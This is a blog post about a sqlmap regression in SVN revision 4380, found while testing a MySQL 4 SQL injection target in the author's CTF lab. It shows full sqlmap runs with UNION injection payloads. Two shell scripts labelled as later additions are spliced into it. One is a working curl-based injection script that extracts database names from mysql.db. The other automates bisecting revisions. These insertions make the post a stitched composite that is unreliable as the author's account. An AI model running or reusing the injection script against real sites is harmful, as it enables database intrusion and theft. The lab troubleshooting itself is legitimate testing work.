Well, psymera and I run a CTF game, and we are constantly adding new VMware machines and new tests just to keep playing and not get bored. As part of an internal training where I work I started to create some videos on how to use sqlmap (I promise to upload them here shortly in a big rant about it), so I started with what everyone does: update your version.
And something interesting happened: sqlmap's enumeration broke (gorgeous), but it didn't look like it. It baffled me at first, so much that I had to do everything by hand, and I asked psymera if he had changed something; he said no.
So this is the info of the updated sqlmap version as of that date:
root@fsckOSX:/pentest/database/sqlmap# svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 4380
Node Kind: directory
Schedule: normal
Last Changed Author: stamparm
Last Changed Rev: 4380
Last Changed Date: 2011-09-19 12:08:08 -0700 (Mon, 19 Sep 2011)
The SVN revision is 4380, the latest as of September 19th. Here is a run against the vulnerable web server with this revision:
root@fuckOSX:/pentest/database/sqlmap# ./sqlmap.py -u "http://XXX.XXX.XXX.XXX/index.php?page=search" --data="search=aaa" --dbs
sqlmap/1.0-dev (r4380) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:26:22
[14:26:22] [INFO] using '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session' as session file
[14:26:22] [INFO] resuming injection data from session file
[14:26:22] [INFO] resuming back-end DBMS 'mysql 4' from session file
[14:26:22] [INFO] testing connection to the target url
[14:26:23] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: search
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: search=aaa' UNION ALL SELECT CONCAT(CHAR(58,107,98,119,58),CHAR(82,88,103,80,76,100,72,90,73,105),CHAR(58,116,99,109,58))# AND 'MXBu'='MXBu
---
[14:26:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 4
web application technology: PHP 4.3.9, Apache 2.0.52
back-end DBMS: MySQL 4
[14:26:23] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[14:26:24] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
[14:26:24] [WARNING] the SQL query provided does not return any output
available databases [1]:
[*]
[14:26:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX'
[*] shutting down at 14:26:24
So note the:
available databases [1]:
[*]
This is interesting: it apparently FINDS the database, but there is no name for it. This is the part that had me baffled (obviously table and column enumeration also failed, as sqlmap didn't know the database name).
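What sqlmap is doing behind that warning is worth seeing by hand, since on MySQL < 5 there is no information_schema and the database names have to come from mysql.db (or, failing that, from DATABASE()). The following shell script is added here as an example; it is not part of the original post and not sqlmap's own code. It builds the same kind of 1-column UNION payload shown in the run above, with the CHAR()-encoded markers decoded from the page's payload (":kbw:" and ":tcm:"), and pulls the marked value back out of the response body. The target URL, the "search" parameter and the use of curl are assumptions taken from the run above; rows are walked one at a time with LIMIT instead of GROUP_CONCAT because that function does not exist on MySQL 4.0.

```shell
#!/bin/sh
# Manual stand-in for sqlmap's --dbs on MySQL < 5 (example code, not sqlmap's own).
# Assumptions: same 1-column UNION injection point in the POST parameter
# "search" as on this page; TARGET is a placeholder; curl is available.
TARGET="${TARGET:-http://XXX.XXX.XXX.XXX/index.php?page=search}"

# Markers decoded from the page's payload: CHAR(58,107,98,119,58) and
# CHAR(58,116,99,109,58). sqlmap wraps the value it wants in markers so it
# can find it inside an arbitrary HTML body.
PRE=':kbw:'
POST=':tcm:'

# to_char STRING -> CHAR(n,n,...), so the markers carry no quote characters
# (the only quote left in the payload is the one breaking out of the query).
to_char() {
    printf 'CHAR(%s)' "$(printf '%s' "$1" | od -An -v -tu1 | tr -s ' \n' ',,' | sed 's/^,//; s/,$//')"
}

# db_payload N -> POST body returning the N-th distinct db name from mysql.db,
# wrapped in the markers. The trailing LIMIT applies to the whole UNION in
# MySQL; that is fine here because the original SELECT for 'aaa' matches nothing.
db_payload() {
    printf "search=aaa' UNION ALL SELECT DISTINCT CONCAT(%s,db,%s) FROM mysql.db LIMIT %d,1#" \
        "$(to_char "$PRE")" "$(to_char "$POST")" "$1"
}

# current_db_payload -> the fallback sqlmap takes when mysql.db is unreadable
current_db_payload() {
    printf "search=aaa' UNION ALL SELECT CONCAT(%s,DATABASE(),%s)#" \
        "$(to_char "$PRE")" "$(to_char "$POST")"
}

# extract_marked: read a response body on stdin and print the text between
# the markers; prints nothing when the markers are absent (e.g. no such row).
extract_marked() {
    sed -n "s/.*$PRE\([^:]*\)$POST.*/\1/p" | head -n 1
}

# post_body BODY -> response body from the target (network; not run by tests)
post_body() {
    curl -s --data "$1" "$TARGET"
}

# list_dbs: walk mysql.db row by row until a row comes back empty. If even
# row 0 is unreadable (the app account has no SELECT on mysql.*), fall back
# to DATABASE(), which is the same fallback sqlmap reports as "current database".
list_dbs() {
    n=0
    while :; do
        name=$(post_body "$(db_payload "$n")" | extract_marked)
        [ -n "$name" ] || break
        printf '%s\n' "$name"
        n=$((n + 1))
    done
    if [ "$n" -eq 0 ]; then
        post_body "$(current_db_payload)" | extract_marked
    fi
}

# Only talk to the network when explicitly asked, so the functions can be sourced.
if [ "${1:-}" = "list" ]; then
    list_dbs
fi
```

Run it as `sh listdbs.sh list` (assumed file name) from a host that can reach the target. If the first mysql.db row already comes back empty, the web application's MySQL account most likely cannot read the mysql schema, and DATABASE() is all you will get; that is the same situation in which sqlmap falls back to the current database.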
So I started rolling back; some revisions (such as 4320) would even crash on run (this is normal, as sqlmap is a very active project), and after a while I found the last revision that worked:
root@fuckOSX:/pentest/database/sqlmap# svn update -r 4319
D _sqlmap.py
U xml/payloads.xml
U plugins/dbms/sybase/enumeration.py
U plugins/generic/enumeration.py
U sqlmap.conf
U sqlmap.py
U doc/FAQ.pdf
U doc/README.html
U doc/README.pdf
U doc/THANKS
U doc/README.sgml
U lib/takeover/web.py
U lib/takeover/metasploit.py
U lib/utils/hash.py
U lib/controller/checks.py
U lib/controller/controller.py
U lib/core/common.py
U lib/core/threads.py
U lib/core/agent.py
U lib/core/settings.py
U lib/core/dump.py
U lib/core/defaults.py
U lib/core/option.py
U lib/core/optiondict.py
U lib/request/connect.py
U lib/request/comparison.py
U lib/request/basic.py
U lib/techniques/blind/inference.py
U lib/techniques/union/use.py
U lib/techniques/union/test.py
U lib/techniques/error/use.py
U lib/parse/cmdline.py
D tamper/unmagicquotes.py
Updated to revision 4319.
Note how lib/techniques/ had some changes, but the changes from the latest revision back to this one are more than that, so this is a compromise for now.
So here is this revision against the same vulnerable web server:
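Rolling back one revision at a time and eyeballing the output is what the post describes. The shell script below is an added example, not the post's own procedure and not sqlmap's code; it does the same walk over a list of revisions and classifies each run as OK (a named database in the list), BROKEN (the empty [*] bullet shown above), CRASH (a Python traceback) or NODATA (no database list at all). It assumes it is run from the sqlmap checkout and that the target URL is the placeholder used on this page. It passes --flush-session on purpose: both runs on this page start with "resuming injection data from session file", and the r4319 run reports "read from file '.../session': pwnetwork", so without flushing the session a name can be resumed from an earlier run rather than fetched, which muddies the comparison between revisions.

```shell
#!/bin/sh
# Walk back through sqlmap SVN revisions and classify each run
# (example code, not part of sqlmap or of the original post).
# Assumptions: run from the sqlmap checkout; TARGET is a placeholder.
TARGET="${TARGET:-http://XXX.XXX.XXX.XXX/index.php?page=search}"

# classify_run: read sqlmap output on stdin and print one verdict:
#   OK      - the "available databases" list has at least one named entry
#   BROKEN  - the list is there but a bullet is empty ("[*]" with no name)
#   CRASH   - a Python traceback appears in the output
#   NODATA  - no database list at all (e.g. detection did not get that far)
# Only the bullets directly under the "available databases [N]:" header
# count; the "[*] starting at"/"[*] shutting down" lines are ignored.
classify_run() {
    awk '
        /Traceback \(most recent call last\)/    { crash = 1 }
        /^available databases \[/                 { inlist = 1; next }
        inlist && /^\[\*\][ \t]*$/                { empty = 1; next }
        inlist && /^\[\*\][ \t]+[^ \t]/           { named = 1; next }
        inlist                                    { inlist = 0 }
        END {
            if (crash)      print "CRASH"
            else if (empty) print "BROKEN"
            else if (named) print "OK"
            else            print "NODATA"
        }'
}

# walk_revisions REV... : "svn update -r" to each revision in turn, run the
# same --dbs command as in the post (with --batch so it never waits for input
# and --flush-session so nothing is resumed from the session file), and print
# "REV VERDICT" per revision. Network and svn are involved; tests do not call it.
walk_revisions() {
    for rev in "$@"; do
        if ! svn update -q -r "$rev" >/dev/null 2>&1; then
            printf '%s SVN-FAIL\n' "$rev"
            continue
        fi
        verdict=$(./sqlmap.py --batch --flush-session -u "$TARGET" --data="search=aaa" --dbs 2>&1 \
                  | classify_run)
        printf '%s %s\n' "$rev" "$verdict"
    done
}

# Example invocation (assumed file name): sh walk.sh 4380 4350 4320 4319
if [ $# -gt 0 ]; then
    walk_revisions "$@"
fi
```

A CRASH verdict for a revision (as the post reports for 4320) says nothing about the enumeration bug itself, so skip over such revisions rather than treating them as either good or bad when narrowing down where the behaviour changed.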
root@fsckOSX:/pentest/database/sqlmap# ./sqlmap.py -u "http://XXX.XXX.XXX.XXX/index.php?page=search" --data="search=aaa" --dbs
sqlmap/1.0-dev (r4319) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:26:53
[14:26:53] [INFO] using '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session' as session file
[14:26:53] [INFO] resuming injection data from session file
[14:26:53] [INFO] resuming back-end DBMS 'mysql 4' from session file
[14:26:53] [INFO] testing connection to the target url
[14:26:54] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: search
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: search=aaa' UNION ALL SELECT CONCAT(CHAR(58,107,98,119,58),CHAR(82,88,103,80,76,100,72,90,73,105),CHAR(58,116,99,109,58))# AND 'MXBu'='MXBu
---
[14:26:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 4
web application technology: PHP 4.3.9, Apache 2.0.52
back-end DBMS: MySQL 4
[14:26:54] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[14:26:54] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
[14:26:54] [WARNING] it was not possible to count the number of entries for the used SQL query. sqlmap will assume that it returns only one entry
[14:26:56] [INFO] fetching number of databases
[14:26:56] [ERROR] unable to retrieve the number of databases
[14:26:56] [INFO] falling back to current database
[14:26:56] [INFO] fetching current database
[14:26:56] [INFO] read from file '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session': pwnetwork
available databases [1]:
[*] pwnetwork
[14:26:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX'
[*] shutting down at 14:26:56
root@fsckOSX:/pentest/database/sqlmap#
Here it is!!!
available databases [1]:
[*] pwnetwork
Just my 2 cents; this has been verified by other people, and I hope that if someone uses the tool and suddenly scratches their head, they can roll back to the working revision while the sqlmap developers fix this (you guys are awesome, keep up the excellent work!!!).